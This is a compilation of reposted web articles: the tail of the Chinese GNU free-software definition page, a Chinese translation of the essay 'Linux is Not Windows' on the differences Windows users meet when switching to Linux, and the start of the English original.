最后,请注意,这些有关自由软件定义的标准需要审慎的诠释。我们根据某一软件选定的许可方式是否符合上述四点软件自由的精神和重点文字,来决定该软 件是否符合自由软件的标准。如果某一软件含有不公平、违背上述四点自由软件精神的限制,就算该软件发行了,我们拒绝使用它。有时候,一份许可证会引发一些 讨论,在接受它成为一份自由软件许可证之前,需要我们和一些律师法律专家们共同来判断和思考,当我们达成共识的时候,我们会更新自由软件标准,让使用者更 容易了解什么许可方式是符合或是不符合自由软件定义的。

如果你对某份特定的许可方式是否符合自由软件的许可方式有兴趣,请见我们的 「许可方式一览表」 一文,如果你感兴趣的许可方式不在我们的列表中,请直接透过 email 问我们。来信请寄 <licensing@gnu.org>

可能的情况下,如果你真的需要一份新的许可证,那么在我们的协助下你可以确定那许可证是否真是自由软件许可证,从而避开许多实际上的问题。


其它团体已经开始使用「开放源码 」一词,以用来指称与「自由软件 」在某种程度意义相当,但是仍不尽相同的事物。我们倾向於使用「自由软件 」的原因在於,一旦你曾听过它意指自由,而非免费,那么 你就可以从它的称呼上知道它所著重的是自由了


进阶阅读


本页的 翻译文本

回到 GNU 工程主页

请将关於「自由软件基金会」以及「GNU 工程」的查询送到 gnu@gnu.org 。也有 其它方式可以联系 自由软件基金会。
请将失效链接以及其它网页的更正(或建议)送到 webmasters@gnu.org

请查阅 翻译读我 以取得关於「协调」与「寄交」翻译的信息。

请将有关翻译的问题送到 GNU/CTT翻译人员
翻译: 林钰维 | Yuwei Lin | yuwei {at} ylin {dot} org 。
验证: 刘 昭宏 <chliu@gnu.org> 。

Copyright (C) 1996, 1997, 1998, 1999, 2000, 2001, 2002, 2003, 2004 Free Software Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110, USA
Verbatim copying and distribution of this entire article is permitted in any medium without royalty provided this notice is preserved.
本文允许在不变更文档内容的前提下刊登在任何形式的媒体中,但需保留此声明。

from: http://www.gnu.org/philosophy/free-sw.zh-cn.html

Linux不是Windows/Linux is Not Windows

如果你访问了这个页面,那么十有八九你是一个 Linux 的新用户,你正遇到许多关于如何由 Windows 转向 Linux 的困惑,这篇文章的目的正是向新手解释这个问题。由于这个大问题衍生出许多枝节,下面我将对此逐一进行讨论。

问题一:Linux 和 Windows 完全不一样

你一定会惊讶于有这么多人对 Linux 发出相似的抱怨,他们奔向Linux,希望找到一个免费的、开源版的 Windows。通常,这正是那些狂热的 Linux 使用者所告诉他们的那种状况。然而这却是个荒谬的期待。

人 们尝试 Linux 的原因不尽相同,但所有的原因都可以归结为一点:他们希望 Linux 会比 Windows更优秀。正是出于这一点,Linux的低成本、更广阔的选择范围、高性能和高安全性——当然,还有许多其它的方面——被作为与 Windows比较时的衡量标准。往往每一个开始尝试 Linux 的Windows 用户都是如此。

这正是问题之所在。

太 多的人都忽略了这样一个事实:从逻辑上讲,在保持某样东西与参考物体完全相同的前提下,将其做得更好是绝无可能的。正如一个完美的复制品将与它的母版毫无 差异,但是它不可能会超越原版。所以当你怀抱着 Linux 的使用方式该和使用 Windows 差不多的观念而尝试Linux,并希望它能够做得更好,你便会不可避免地发现他们之间的不同,并且把这些不同之处看作是 Linux 的缺陷。

举一个简单的例子,让我们来想一想驱动程序的升级吧:通常的情况下,倘若我们要在 Windows 下升级某个硬件驱动,我们需要去硬件制造商的网站上找到并下载最新的驱动;然而在 Linux 下,我们只须简单地升级内核即可。

这意味着在 Linux 下,仅仅一次下载和升级便能提供所有适用的最新驱动,然而在 Windows 下我们却不得不浏览多个网站并分别下载升级程序。这是一个不同的过程。并且显然,这绝不会是一种糟糕的体验。然而却有很多人对此抱怨不停,只因为这不是他们习惯的方式。

或者从另一个更经常接触到的例子来看,想一想 Firefox ——开源软件最伟大的成功案例之一。这是一个席卷全球的浏览器。它是通过模仿 IE —— 那个“最流行的浏览器”而取得成功的吗?

不。 它的成功是因为它比 IE更好。它之所以更好正是因为它的不同。它有标签页浏览方式,实时动态的书签,内建搜索条,PNG(图像格式)支持,adblock扩展(屏蔽广告插 件),以及其它美妙的东西。“查找”工具条显示在底部的工具栏中,它能够查找你键入的内容并且以红色标识表示没有相匹配的内容。而 IE却没有标签页浏览,没有RSS订阅功能,搜索条只能通过第三方扩展实现,它的查找对话框还得通过点击“确认”按钮开始查找,而且还要再点击一次“确 认”才能清除“未发现”的错误提示。这无疑地证明了一个开源的应用程序通过“不同”而做到了“更好”,依靠“更好”进而取得了成功。如果 Firefox只是一个 IE 的克隆,它必然早已销声匿迹于 IE 的阴影之下了。如果 Linux 是 Windows 的一个克隆,同样的事情也会发生在Linux 身上。

因此,解决这个问题的关键在于:记住在 Linux 中那些对于你的使用习惯来说熟悉的部分,并不是说明 Linux 是新版的和改进版的 Windows。积极地面对那些不同之处,因为只有不同,Linux 才有机会真正闪耀出其光彩。

问题二 : Linux 和Windows 太不一样了

当 人们期待着 Linux 有所特色时,又一个问题接踵而至。Linux 和Windows 实在是太不一样了,一些差异简直难以让人适应。也许最典型的例子就是可供 Linux 用户选择的东西实在是太多了。对于一个刚上手的Windows 用户,他已拥有一个经典的或 Windows XP 风格的桌面主题、写字板程序、IE 浏览器,OutlookExpress;然而对于一个初学 Linux 的家伙,他面前有上百种发行版供其挑选,然后,是 Gnome、KDE 或者Fluxbox(桌面环境),vi、emacs 或者 kate(文本编辑器),Konqueror、Opera、Firefox 或者Mozilla(网页浏览器),或者其他一系列可供选择的工具。

Windows 用户不曾为了安装和使用(操作系统)而面对过如此丰富的选择。“有必要提供那么多种选择吗?”这样的抱怨帖子很常见。

Linux 真的和 Windows 有那么大的区别吗?不管怎么说,它们都是操作系统。它们都做同样的工作:操作你的计算机,让你有个运行应用程序的东西,自然它们多少都有些共通的地方吧?

让我们从这个角度看问题:出门看看路上行驶的各种不同车辆。所有的车辆不管是什么样的设计,都有同样的目的:从路上把你由A处运到B处。注意它们有不同的设计。

但是你会想,汽车之间的差异非常小:它们都有方向盘、脚踏板、变速杆、手刹车、车窗、车门、油箱……如果你能够开这部车,你就能开任何一部车。

确实如此。但你有没看见过有些人不开汽车,取而代之他们骑摩托车?

从一个版本的 Windows 切换到另一个版本就像从一辆汽车换到另外一辆汽车。Win95 到 Win98 ,老实说我说不出有什么区别。Win98 到 WinXp,差别比较大但是也没有什么真正的重大区别。

但是从 Windows 切换到 Linux 就象从开汽车切换到骑摩托车。他们都是操作系统(道路车辆)。他们可能都使用同样的硬件(道路)。他们可能都提供一个运行应用程序的环境(把你从甲地运到乙地)。但他们使用本质不同的两种方法来达到目的。

Windows(汽车)对于病毒(小偷)并不安全,除非你安装反病毒软件(锁上车门)。Linux(摩托车)却没有病毒(车门),所以即使你没有安装反病毒软件(没锁车门)也非常安全。

让我们反过来看一看:

Linux(汽车)从根本上用于多用户(乘客们)。Windows(摩托车)用于单用户(乘客)。每个 Windows 用户(摩托车驾驶员)每时每刻都要习惯集中精力控制他的计算机(车辆)。而一个 Linux 用户(汽车乘客)只有在以 root 根用户身份登录(坐在驾驶座上)时才要去控制计算机(车辆)。

通 过两种不同的方法来达成同样的目标,他们各有优缺点:当载上一家子的成员和大包小包的货物从甲地至乙地时,一辆车显然是明智的选择:因为它有充裕的座位以 及足够的储存空间。而对于一个人从甲地到乙地的情况,摩托车则是更好的选择:因为它不怎么会遇上堵车,消耗的燃油也更少。

无论选择摩托车或是汽车,仍有很多事情不会改变:你要把油加进油箱,把车开在同一条道上,而且必须遵守红绿灯,在转弯前要打转向灯,你同样也要遵守限速指示。

但是也终究有很多情况不同了:汽车驾驶者不必带着安全头盔开车,摩托骑手不用系安全带;开车的人转动方向盘来转弯,摩托车驾驶者则要倾斜身子改变重心;开车的人需要踩油门踏板来加速,而摩托车通过手旋转手把来控制加速。

一 位汽车司机如果试图通过转移重心来拐弯,很快就会陷入一堆麻烦中。同样的,一个 Windows用户如果认为自己的经验可以直接派上用场,结果也会因为相同的原因而徒劳无获。事实上,较之电脑新手,一个 Windows “高级用户”在Linux 的使用过程中常遇上更多麻烦。那些经验丰富的 Windows用户在面对问题时,如果无法解决,常会觉得“如果我这么有知识的,都搞不定,那新手就更不别想了”,因而得出“Linux离桌面应用还有十 万八千里呢”的强烈想法。但这显然是与事实不符。

解决方法在于:Windows 用户必须意识到他只是一个有经验的 Windows 用户,而不是有经验的电脑用户,Windows 用户必须意识到当自己在尝试 Linux 时,他又成了一个新手。

问题三: 文化冲击

子问题 A : 那是一种文化

Windows 用户或多或少地处于一种消费者和供应商之间的关系:他们花钱买软件,获得授权,得到支持,等等。他们希望软件能够有确切的可用性。因此他们习惯于去得到使 用软件的权利:他们花钱去得到技术上的支持以及他们得到他们想要的权利。他们也经常要与一些除了个人之外的实体打交道:例如他们与一家公司签一份合同。

Linux 用户有着更多的一致性。他们不需要花钱去买软件,不需要为得到技术上的支持而耗费财力。他们免费下载软件,并且使用在线聊天工具和到论坛去寻求帮助。他们和个人打交道,而不是公司。

一个 Windows 的用户如果只是把他的观点带到 Linux 中,那么他是不会喜欢上 Linux 的,这需要慢慢地适应。

引 起矛盾的最大原因在于在线交流方面:一个初学 Linux的菜鸟在遇到问题时寻求帮助,当他没有得到他可以接受的答案的时候,他便开始抱怨并且想要得到更多的帮助。因为这正是他以前用付费来获得帮助的 方式。问题就是这不是付费提供帮助的系统。而是很多热心人发自内心地帮助其他人解决问题的系统。一个新的用户没有任何权利去向这些热心人索要帮助,这就如 同一个想要得到施舍的人,还要求从捐赠者那里获得更多的捐赠品一样。

同样,一个 Windows用户习惯了使用商业软件。这些软件在没有做到足够的可靠性、功能性以及对用户友好的界面之前,公司是不会发布该软件的。因此这正是 Windows用户希望软件是从1.0 版本开始的。而 Linux 软件一旦重写就会立即发布,因此是从 0.1版本开始的。这样的,真正需要这些功能的人就会马上得到它;感兴趣的开发者会来帮助改进代码,;以及社区就会知道接下来要做什么了。

如果菜鸟在使用Linux时遇到了困难,他会抱怨:这个软件没能满足我的需求,并且他认为他有权得到这样的满足。如果他得到这样带有讽刺性的回答:“如果我是你,我要求退款!”,他的情绪将会更差。

因此,为了避免这些问题,应做到:只要记住,你并没有付给那些软件开发者或者在线帮你提供技术指导的人任何钱。他们并不欠你任何东西。

子问题 B : 新的 VS. 旧的

Linux 几乎是因黑客的业馀爱好而诞生的。它的成长也使得易于它吸引了更多志同道合的黑客们。Linux在获得一个易于使用的可用安装程序前一直默默无闻。在相当 长的时间里,它在大众眼中只是一个极客(Geek)而已。可以说Linux“始于极客,馈于极客”。直至今日,大多数 Linux 的老用户仍自认为是极客。

这是件非常好的事情:如果你在硬件或软件方面有问题,存在一大群极客们不断寻找解决方案这个状况,显然一种明显的优势。

但 长久以来 Linux 的成长仍旧十分有限。尽管存在一些可以被绝大多数人安装的发行版本,甚至一些版本基于 CD 并且与用户使用的硬件并无冲突。当Linux开始因其无病毒和廉价的升级而吸引一些非发烧友用户时,两大用户阵营间并不是没有摩擦,但双方都明了一点:对 方都没有恶意,仅仅是缺乏相互理解而已。

首先,你面临的是核心极客们仍然假设所有使用 Linux的用户们都是极客同志。这意味着他们认为所有人都对此有很深入的理解,这导致了他人控诉他们的一些行为是傲慢、自大和无礼的。事实上,有时如 此。但大多时候却并非这样:“每个人都应知道”这样的善意表达被说成了“地球人都知道!”——大相径庭。

其次,你面临着从使用的商用操作系统转投而来的新用户。这些用户已习惯使用人机界面友好的软件,他们也是不确定因素。

这类问题起因于不同使用习惯的碰撞:第一类人沉醉于不断地按自己喜好重构系统,而第二类人对操作系统如何工作漠不关心,只要它能工作就好。

在乐高(Lego)玩具发生的类似的情况正好阐述这种问题。试想下面的情景:

新用户(以下简称“新”):我想要一个新玩具汽车,每个人都因乐高汽车的好玩而着了迷。所以我也买了它,但当我到家後我才发现,我的盒子里只有积木和齿轮!我的车子在哪里?

老用户(以下简称“老”):你应该在积木之外组装一辆车,这才是乐高的真谛。

新:什么??我不知道应怎样拼装这个车子。我不是个机械师。为什么我应该知道如何组装它?

老:盒子里有使用手册。它上面写着拼装车子的步骤。你不用知道原理,只要按照按部就班就好。

新:好吧,我找到了步骤。这将占用我很多时间!为什么厂家不能装好了再卖给我,还得让我自己动手??

老:并不是所有人都满足于将乐高做成玩具车。这些积木可以被我们组成万物。这才是游戏的真谛。

新:我仍旧不明白为什么厂商不能给我们这种想要车子的人一个成品,如果那些喜欢动手的人高兴可以自己拆了它阿。无论如何,我还是将它组装起来了,尽管某些部件时不时地掉下来。我有什么方法可以解决吗?我能将它们粘起来吗?

老:这就是乐高。他就是用来拆装的。这才是游戏的真谛。

新:但我不希望总是拆拆装装,我仅仅希望一个玩具车而已!

老:呃,欢迎您到地球来。你买的是乐高吗?

很明显,对那些只想要一个玩具车的人来说,乐高并不是为他们准备的。上面的情景应该不会发生在你的生活中。乐高的价值在于你可以建造过程中体会乐趣而且你也可以将它组装成任何你想要的东西。如果你不想动手拼装,只能说乐高不适合你。这显而易见。

由于长久以来一直关注 Linux 的老用户,同样的问题在 Linux 上越发明显:它是开源的、完全可定制的软件集。这才是真谛。如果你不想修改一些组件,为什么自找麻烦来使用它呢?

与 乐高出售成品玩具的做法略有相似,通过最近的一系列的成果提升了非黑客用户使用 Linux 的舒适性,这使得更广大的用户可以使用Linux。也正因如此,你仍可以听到与上面相似的对话,程度也仅是略有不同。新用户抱怨老用户只考虑基本特性,他 们不得不通过阅读手册才能实现一些功能。对太多发行版本的抱怨,对软件过多配置选项的抱怨和对运行时时常报错的抱怨不正如对乐高有太多模块的抱怨一样忽略 了它可以被用来按你想发拆装成事实吗?

因此,为了避免这个问题:请铭记现在的 Linux 已今非昔比。Linux 社区最大的也是最关键的组成部分——黑客和开发者们,他们因 Linux 的可以按需定制而欢喜;他们也会可制定能力的丧失因而神伤。

问题四: 为设计者而设计

在汽车工业中,你很难发现一个人即设计车辆引擎也设计车辆内饰:这些是完全不同的技能。没有人想要只是看起来可以跑得很快的引擎,同样也没有人想要一个做工出众但狭小且肮脏的内饰。基于同样的道理,在软件产业,用户界面(UI)往往不是由软件编程人员设计的。

但 在 Linux 的世界却大不相同:一个项目往往是因个人的兴趣而产生。个人也包办了所有的工作,因此这些项目的界面往往缺乏了“用户友好”的特性:用户对这个软件了如指 掌,所以他也就不需要了帮助文件等。vi就是一个很好的例子,最初它的目标用户就是为那些了解它工作方式的人。因而设计者从来都没有想过如何用其他方式退 出 vi,所以新用户不得不靠重启计算机退出的事情时有发生。

但是,自由开源软件(FOSS)程序员与商用软件程序员的一个最重大区别在 于,FOSS程序员的作品都是他们自己想要使用的东西。因此当作品不能被新用户“舒适”使用的同时,它又成为了最终用户最需要的东西:因为作者也是最终用 的一员。商用软件的程序员却大不相同,他们总是为其他人编写软件,而且这些用户都不是专家。

所尽管 vi 拥有拥有一个令新手望而生畏的界面,但它仍然在当今流行,这又归功于他的界面:当你熟悉後就会发现它原来无比强大。Firefox 也是被经常浏览网页的人编写出来的。Gimp 同样是出自经常处理图形文件的人之手。不胜枚举。

Linux 的界面对于新手而言同样的有些“难度”。尽管 vi名声在外,但他仍然不在那些需要快速修改一些文件的新手的考虑之列。如果你在一个软件生命周期的早期使用它,光鲜亮丽且友善的用户界面永远只高挂在 “计划”列表之上:功能优先。没有人先雇好装修队再去找楼盘,程序员们都是实现功能再不断改进界面。

所以,为了避免这个问题:寻找那些已便于上手为目的设计的软件,或者接受那些与你使用习惯急剧不同的软件。抱怨 vi 对新手不够友好只是舍本求末罢了。

问题五: “用户友好”的神话

在电脑世界里,“用户友好“是一个十分广泛的专有名词。甚至有一个网络笑话就叫这个名字。但这个词却名不副实。

基本实现方法听起来似乎不错:软件的设计要从用户的想法和需要出发。这个方法一直都被认为是单一的实现办法,但事实并非如此。

如果你一辈子都在进行文书处理的工作,理想的软件对你来说就是个快捷强大、能让你投入最小的精力来实现最大的工作效率的文字处理软件。简单的键盘快捷键和无须鼠标的操作将是最基本的需求。

但如果你很少做字处理的工作,你只是要写一封普通的信,那么你不会想着去学会那些键盘快捷键操作方法。排列有序的菜单和一目了然的工具栏图标就是你的理想环境。

很明显,你为某个用户的需求所设计的软件可能对其他的用户来说并不合适。如此说来,若我们每个人都对软件有不一样的需求,那这些软件怎么能自称“用户友好”呢?

简单来说:“用户友好”并非事实,只是为了让复杂的情况看上去变得简单一点而已。

那么“用户友好”到底是什么意思呢?好吧,从那些使用这个词的文章中来看,“用户友好”的软件实际上意味着“该软件对那些以前从未使用这个软件的用户们来说也不是那么难上手”。这就使得那些看上去用户界面都差不多的软件都被归类为“用户友好”。

子问题 A: 熟悉的就是友好的

所以在大多数被认为“用户友好”的文字编辑 和文字处理的系统中,你的剪切和复制使用 “Ctrl+X” 和 “Ctrl+V” 来完成,这完全不直观, 但是每个人都习惯这些快捷键,所以他们把这当作“友好的”快捷方式。

如果有人使用 vi 并且发现里面 “d” 是剪切,“p” 是复制,这将被当成是不友好的:因为这不是大多数人习惯的方式。

但这是更好的方式吗? 明显是的。

如果使用“Ctrl+X”的方法,你怎样从你当前正在编辑的文件中剪切一个单词?(没有鼠标的前提下!)

你必须从开头的字符开始,用“ Ctrl+Shift+Right”来选择单词.

然後“Ctrl+X”把它剪切下来。

vi中的方式呢?“dw”就是删除单词的意思。

如果要剪切 5个单词使用 “Ctrl+X” 方式会出现什么情况呢?

从开头的单词开始:

“Ctrl+Shift+Right”

“Ctrl+Shift+Right”

“Ctrl+Shift+Right”

“Ctrl+Shift+Right”

“Ctrl+Shift+Right”

“Ctrl+X“

要使用5个动作

在 vi 中的情况呢?

d5w

vi 方式具有更好的功能性和直观性 。“X” 和 “V”并不是能够直观记忆“Cut”和 “Paste” 命令的,反之 “dw” 对于 “delete” 和 “p” 对于 “Paste”更加直观,相对于 “X” 和 “V” 方面,vi明显是更好的。可是由于她不是大家所熟悉的,因此她被认为是不友好的。并不是因为其他的原因,纯粹的习惯因素使得Windows成为了更加友好 的系统。因此我们要学习问题一:Linux 和 Windows 完全不一样。告诉大家:不可避免,Linux 经常显得没有 Windows “友好”。

为了避免这个问题,你们要记住“友好”并不意味着习惯,试着用你的方式来做事,如果没有用的话,试着想想一个初学者会怎么做,然後你就知道了更简单的方法。

子问题 B: 低效的就是友好的

这是一个可悲的但无法逃避的事实。似乎你越想提高一个程序的功能性,它就看起来越友好。

这是因为友好性是通过在用户界面中使用简单、可视化的“线索”实现的——越多越好。毕竟,如果一个完全的计算机新手被放到一个所见即所得的字处理软件前并被要求把一些文本变成粗体,接下来很有可能:

  • 他会认为 "Ctrl+B" 是通常的方法。
  • 他会寻找线索,并尝试点击 "编辑" 菜单。如果不成功,他就会从接下来的一系列菜单中尝试比较像的那个:“格式”。新的菜单有一个看起来很有希望的“字体”选项。嗨!这里有我们想要的“粗体”选项。成功了!

下次你再做任何文字处理,都想试着通过菜单来完成每一件工作:不用快捷键,也不用工具栏图标。菜单就是一切。当任务突然需要大量按键和鼠标点击时,你会发现你比爬还慢。

这 样使软件变得“用户友好”就像在自行车上装辅助轮一样:它让你能马上骑起来起来,不需要任何技巧和经验。这对一个初学者来说是完美的。但是没有人会觉得所 有的自行车都应该加上辅助轮销售。如果你今天得到这样的一辆自行车,我敢打赌你要做的第一件事就是除去这不必要的阻碍:一旦你知道怎样骑车了,辅助轮就没 用了。

同样的道理,大量的 Linux 软件是设计成不带“辅助轮”(辅助工具)的——它是为已经有一些使用的基本技能的用户设计的。毕竟,没有人是永远的新手:无知是短命的,知识是永远的。因此 Linux 软件是以大量的知识为前提设计的。

这听起来也许像是借口:毕竟,MS Word(微软的Word)有全部的友好菜单,并且有各种工具栏按钮, 而且有快捷键……它是世界上最棒的。真的吗?友好且有效的。

然 而,我们必须透过表象看问题。首先,这个想法的可行性:让一个软件拥有菜单、工具栏、快捷方式等一切意味着大量的源代码编写,而没人为 Linux开发者花费的时间付帐;其次, 这样做依然没有真正考虑到那些高端用户;极少有专业的文字录入者使用MS Word。你见过哪个编程的人用 MSWord 吗?与此相比,想想有多少人用 emacs 和 vi。

为什么会这样?首先,这是因为某些“用户友好”的行为会导致低效: 参看上面的“剪切和粘贴”的例子。其次,这还因为 Word大部分的功能被放在了菜单里,因此你不得不使用菜单。只有某些最常见的功能可以作为按纽被放在界面的工具栏上。高级用户不得不花大量的时间来找到 那些较少用道,但对高级用户来说依然很常用的的功能。

另外请记住,不管怎样,那些“辅助轮”在 Linux 软件中也同样有,尽管他们不是那么容易被发现,但实际在 Linux 中通常都会有。

以 mplayer 播放器为例。你可以在终端输入 mplayer视频文件名命令来播放视频文件。你可以使用方向键,PageUp、PageDown键进行快进、后退等操作.这些可能还不能称之为完全的 “用户友好”,但如果你在终端输入 gmplayer 视频文件名 ,你就会看到图形版的播放器,它同样拥有漂亮、友好的界面,熟悉的按钮。

再 用从 CD 转换到 MP3(或 Ogg)为例: 如果使用命令行, 你需要先使用 cdparanoia命令。然后你再需要一个编码器……这会是一个恶梦,就算你完完全全清楚如何使用 (imho) 包。所以,下载和安装Grip吧。这是一个容易使用的图形软件,自动的在背后使用 cdparanoia 命令和编码器,令你的转换过程变得简单,甚至支持CDDB,能自动为你的档案命名。

同样发生在抓取DVD上:选择正确的编码是一场噩梦。但是使用dvd::rip软件,可以在一个任何人都能操作自如的图形界面来完成整个编码过程。

因此避免这个问题:要记住“辅助轮”(辅助工具)仅作为Linux的扩展,而不是由主程序自动提供的。而且有时,“辅助轮”还不成为设计的一部分。

问题六:模仿 VS. 汇合

当人们发现 Linux 不是他们想要的 Windows 复制品时,经常争论一件事,就是坚持认为 Linux 一诞生,这就是(或应该是)其努力的方向,而且那些不明白这一点的人错误地帮助,使 Linux 更像 Windows。由于这一点,他们展开激烈的争论:

Linux 已经从命令行时代进入了图形界面时代,这是复制 Windows 的明显尝试。

不错的理论,但是错了:最初的 X 窗囗化系统(见 附录)是于1984年发布,继承自1983年移植到 Unix 上的 W 窗口化系统。而 Windows 1.0是在1985年才发布的。Windows 在1990年发布第三版之前并没有做大——那时,X 窗口化系统已经演化成我们今天使用的 X11版本好几年了。Linux 在1991年才开始,所以 Linux 没有开发一个 GUI(图形用户界面)来模仿 Windows:它只是使用了一个在Windows 出现之前就已经存在的 GUI。

Windows 3 系列让位于 Windows 95,后者带来了图形界面的革命性变化;在这以后很多年,微软都没能作出与此类似的创举。Windows 95 带来了多项创新的特性:拖放功能、任务栏等等。当然,这些也同样被 Linux 所借鉴。

事实上……不是这样的。上述所有的特性在微软使用前就已经出现了。尤其,NeXTSTeP(见附录介绍)是一个非常先进的图形用户界面(就当时而言),它明显早于 Win95 ──1989年发布了第一版,1995年发布了最后一版。

不错,不错,所以微软并没有想出被我们认为是 Windows 界面的独有特性。但它还是创造了一种界面,Linux 从那时起尝试模仿它。

为了揭穿这些,我们可以引用一个经常被讨论的说法:趋同现象。它说的是:两个不同的、各自独立的系统随着时间的推移会逐渐变得类似。这种现象经常发生在生物学领域。举例来说:鲨鱼和海豚,他们都有着类似的背鳍、胸鳍和尾鳍,以及同样的流线型外形。

但 是,鲨鱼是由鱼进化而来的,而海豚则是由陆地上的哺乳动物进化而来的。他们拥有类似外形是由于他们都生活在同样的海洋环境中,他们必须朝最大效率适应海洋 环境的方向进化。实际上不会有一幕这样的场景:未进化的海豚看到鲨鱼以後就开始想“Wow,看看鲨鱼的鳍,它们非常有用。我也要这样进化一套自己的鳍!”

同 样,如果先看早期的 Linux 桌面、FVWM 和 TWM 以及许多简陋的 GUI(图形用户界面),然后再看看今天的 Linux桌面、Gnome 和 KDE,以及它们带有的任务栏、菜单、视觉效果。是的,不得不说现在的 Linux 比早期的更像 Windows 了。

另一方面,Windows也同样如此;我印象中 Windows 3.0 没有任务栏。那么开始菜单呢?什么是开始菜单?

Linux 过去没有任何桌面像今天的 Windows,微软过去也没有。现在他们都有了,这说明什么问题呢?

这说明两个开发阵营的成员都在寻找提升GUI(图形用户界面)性能的方法,但是解决相同的问题可供选择的方法并不多,他们难免会使用类似的方法。类似并不能说明或暗指一方在模仿另一方。记住这一点,你就不会受到这个问题的困扰了。

问题七:那些 FOSS(自由和开源软件)的事

噢,这导致了问题。非本质的:自由和开源的软件是整个事情中一个极好的和很重要的部分。但是对于一些人看来,理解 FOSS(自由和开源软件)和私有软件之间的不同是一个巨大的改变。

我已经提醒了一些事实,人们认为他们需要并喜欢技术支持。但是事实往往离得很远。

微软的使命声明是“A computer on every desktop(每个电脑都需要桌面)”——不言而喻,每一台计算机应该运行 Windows。微软和苹果公司都销售操作系统,都尽他们最大的努力来保证大多数的人们使用他们的产品:他们是企业,为了赚钱。

并且FOSS(自由和开源软件)也在那里,甚至今天,几乎都是非商业的。

当 你发电子邮件告诉我,Red Hat、Suse、Linspire 和所有Linux发行版:是的,我知道他们在“销售” Linux。我知道他们都希望 Linux 被广泛的采用,特别是他们自己的版本。但是不要混淆提供者和生产者。Linux内核不是被一个公司创造,不是为了获取利润而维持它。这些 GNU 工具不是被一个公司创造,同样也不是为了牟取利润。X11视窗系统……不错,当前最流行的实现方案是xorg,并且“.org”应该部分地告诉你需要知道 的(注:.org为非盈利组织)。桌面软件:好的。你提出一个例子,比如 KDE,由于其基于的Qt是商业化的。(译者注:现在 Qt 已经不是商业化的了)。但是Gnome、Fluxbox、Enlightenment等等,都是非盈利的。那儿是有人销售Linux,但是那只是非常少数 的。

私有软件最终用户数量的增加导致了制作那些软件公司直接的经济效益。对于FOSS(自由和开源软件)来说,并不是这样,使用人数的增 加并不会产生直接的收益。肯定是:个人自豪感,发现Bug(错误)能力的增长,更多可能得吸引新的开发者,可能有机会得到个好的工作,等等。

但 是 Linus Torvalds(Linux 的创始人)没有从 Linux 使用权上挣钱。Richard Stallman( GNU 创始人)没有从增长的 GNU使用权中获利。所有运行 OpenBSD 和 OpenSSH 的服务没有放一分钱到 OpenBSD 项目的钱袋中去。所以我们来看,这就是在Linux 和新用户之间最大的问题:

他们发现了不想要的东西。

新用户来到 Linux,他们曾经使用一种操作系统,那时,最终用户的需求至高无上的,并且“用户友好性”和“以用户为中心”被认为是第一位的。并且他们突然发现他们 自己将要使用的操作系统:仍然依赖于‘man’文档,命令行,手动编辑配置文档和Google。并且当他们抱怨时,他们没有获得悉心照顾或者承诺的更好的 东西:他们屡屡碰壁。

当然,夸大其词了。有许多人尝试去转换到 Linux 但是失败了。

从另一方面来 说,FOSS(自由和开源软件)事实上是一个非常自我的发展方法:仅当人们想工作的时候才工作,仅工作于他们想工作的东西。大部分人们没有看到任何的需 求,让 Linux 对没有经验的用户更有吸引力:它已经按照他们想要的工作了,为什么他们应该关心它为什么没有为另外的人工作呢?

FOSS(自由和开源软件)和 Internet 自身有很多相似的地方:你不需要付钱给一个网页(软件)的作者,去下载以及阅读(安装)它。对于已经有了带宽(知道如何使用软件)的人们来说,无限的宽带(用户友好的界面)并不是很感兴趣的。博客(软件开发者)不需要很多的读者(用户)来证明写博客日志(编码)。 那里是有许多人从中获得了很多的钱,但它并不是大部分商业喜欢的旧有规则:“我拥有这个,如果你想要一些,你必须付钱”;而它提供了诸如技术支持(电子商务)的服务。

Linux 对市场份额不感兴趣。Linux 没有客户。Linux 没有股东,或者一个盈利亏损的责任。Linux 不是为了赚钱而创造的。Linux 没有成为这个星球上最流行和最普及的操作系统的目标。

所 有的 Linux 社区都想要一种真正不错、充满特色、自由的操作系统。如果 Linux 最终成为一种非常流行的操作系统,那么是美妙的。如果Linux 最终拥有直观的、用户友好的界面,那么也是美妙的。如果 Linux 最终成为一个数十亿美元的产业的基础,那也是美妙的。

它是伟大的,但它不是重点。重点是,让 Linux 成为社区有能力制作的最好的操作系统。不是为了别人:为了它自己。如此普遍关于“除非 Linux如此这样,否则永远不会占领桌面”的威胁是不恰当的:Linux社区没有尝试占领桌面。他们完全不关心它放在你桌面上,是否够好,只要在他们的 桌面,运行的够好。 憎恨微软的人,Linux的狂热者,FOSS(自由和开源软件)提供者或许是吵闹的,但他们仍然只是少数的。

Linux 社区想要的是:一种操作系统能够被任何想要它的人安装。所以如果你在考虑转向 Linux。首先,问你自己,什么是你真的想要的。

如果你想要一种操作系统,没有一个汽车司机在你身边,除了给你把钥匙,把你放在驾驶员的座位上,并且希望你知道要做什么:得到 Linux。你将必须投入时间去学习如何使用它,但是一旦你学会了,你将拥有一种能够站起来跳舞的操作系统。

如 果你只是想要没有恶意软件和安全问题的 Windows:阅读好的安全实践;安装好的防火墙,恶意软件检测者和杀毒软件;用一个更安全的浏览器替换IE ;并且保持升级到最新的安全更新。有人(包括我自己)使用 Windows 从 3.1 到XP,从来不曾被病毒或者恶意软件感染:你也可以做到。不要用 Linux:非常不幸的是,它不会成为你想要它的那个样子。

如果你想要一种基于 Unix 的操作系统的安全性和性能,和以客户为中心的特点和世界著名的界面:购买苹果公司的 Mac 操作系统。Mac OSX是不错的。但是不要用 Linux:它不会做你想要它做的那样。(译者注:据个人观察,现在Linux界面已经接近或者超越Mac OS X。)

这不仅是关于“为什么我想要 Linux?”。也是关于“为什幺 Linux 想要我?”

本文遵循 Creative Commons License 创作共用协议。Creative Commons License

中文版出处 http://article.yeeyan.org/view/sctronlinux/1410

#===================================================================
#===================================================================

In the following article, I refer to the GNU/Linux OS and various Free & Open-Source Software (FOSS) projects under the catch-all name of "Linux". It scans better.

Linux != Windows

(Linux is Not Windows)

Derived works

If you've been pointed at this page, then the chances are you're a relatively new Linux user who's having some problems making the switch from Windows to Linux. This causes many problems for many people, hence this article was written. Many individual issues arise from this single problem, so the page is broken down into multiple problem areas.

Problem #1: Linux isn't exactly the same as Windows.

You'd be amazed how many people make this complaint. They come to Linux, expecting to find essentially a free, open-source version of Windows. Quite often, this is what they've been told to expect by over-zealous Linux users. However, it's a paradoxical hope.

